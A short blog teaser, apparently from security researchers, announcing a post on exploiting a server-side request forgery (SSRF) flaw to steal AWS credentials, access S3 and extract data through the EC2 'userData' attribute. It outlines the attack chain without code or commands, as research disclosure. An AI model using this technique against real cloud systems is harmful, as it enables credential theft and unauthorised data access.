When a web application SSRF causes the cloud to rain credentials & more

The following blog post was written by me and Daniele Costa:


In this blog post we have demonstrated an SSRF exploitation to steal AWS credentials to access Amazon S3. What made this attack special was the fact that was not accessible to our users during the exploitation. Therefore, we had to use the ‘userData’ attribute in EC2 describe-instance-attribute operation to extract the sensitive data.

The unofficial PDF version of this blog post can be downloaded from here: